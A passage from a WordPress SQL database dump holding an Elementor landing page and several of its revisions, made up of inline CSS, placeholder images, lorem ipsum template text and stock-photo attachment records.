(min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','landing page','','publish','closed','closed','','elementor-landing-page-1350','','','2022-09-20 17:48:58','2022-09-20 12:18:58','',0,'https://gopalak.in/?post_type=e-landing-page&#038;p=1350',0,'e-landing-page','',0),(1351,1,'2022-09-20 12:25:53','2022-09-20 06:55:53','','Elementor Landing Page #1350','','inherit','closed','closed','','1350-revision-v1','','','2022-09-20 12:25:53','2022-09-20 06:55:53','',1350,'https://gopalak.in/?p=1351',0,'revision','',0),(1352,1,'2022-09-20 12:25:53','2022-09-20 06:55:53','','Elementor Landing Page #1350','','inherit','closed','closed','','1350-revision-v1','','','2022-09-20 12:25:53','2022-09-20 06:55:53','',1350,'https://gopalak.in/?p=1352',0,'revision','',0),(1353,1,'2022-09-20 12:25:54','2022-09-20 06:55:54','','Elementor Landing Page #1350','','inherit','closed','closed','','1350-revision-v1','','','2022-09-20 12:25:54','2022-09-20 06:55:54','',1350,'https://gopalak.in/?p=1353',0,'revision','',0),(1354,1,'2022-09-20 14:36:52','2022-09-20 09:06:52','','istockphoto-1221688781-612x612','Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.','inherit','open','closed','','istockphoto-1221688781-612x612','','','2022-09-20 14:36:52','2022-09-20 09:06:52','',1350,'https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg',0,'attachment','image/jpeg',0),(1355,1,'2022-09-20 14:40:51','2022-09-20 09:10:51','','803471','','inherit','open','closed','','803471','','','2022-09-20 14:40:51','2022-09-20 09:10:51','',1350,'https://gopalak.in/wp-content/uploads/2022/09/803471.jpg',0,'attachment','image/jpeg',0),(1356,1,'2022-09-20 15:11:33','2022-09-20 09:41:33','','abstract-background-wheat-farm-wallpaper-51701325','','inherit','open','closed','','abstract-background-wheat-farm-wallpaper-51701325','','','2022-09-20 15:11:33','2022-09-20 09:41:33','',1350,'https://gopalak.in/wp-content/uploads/2022/09/abstract-background-wheat-farm-wallpaper-51701325.jpg',0,'attachment','image/jpeg',0),(1357,1,'2022-09-20 15:13:44','2022-09-20 09:43:44','','279356','','inherit','open','closed','','279356','','','2022-09-20 15:13:44','2022-09-20 09:43:44','',1350,'https://gopalak.in/wp-content/uploads/2022/09/279356.webp',0,'attachment','image/webp',0),(1358,1,'2022-09-20 16:20:34','2022-09-20 10:50:34','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy text </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"#\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor Landing Page #1350','','inherit','closed','closed','','1350-revision-v1','','','2022-09-20 16:20:34','2022-09-20 10:50:34','',1350,'https://gopalak.in/?p=1358',0,'revision','',0),(1359,1,'2022-09-20 16:20:34','2022-09-20 10:50:34','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy text </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"#\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor Landing Page #1350','','inherit','closed','closed','','1350-revision-v1','','','2022-09-20 16:20:34','2022-09-20 10:50:34','',1350,'https://gopalak.in/?p=1359',0,'revision','',0),(1360,1,'2022-09-20 16:20:34','2022-09-20 10:50:34','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy text </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor Landing Page #1350','','inherit','closed','closed','','1350-revision-v1','','','2022-09-20 16:20:34','2022-09-20 